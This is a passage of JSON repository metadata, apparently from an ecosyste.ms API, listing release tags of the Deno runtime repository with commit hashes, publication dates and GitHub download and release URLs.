.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F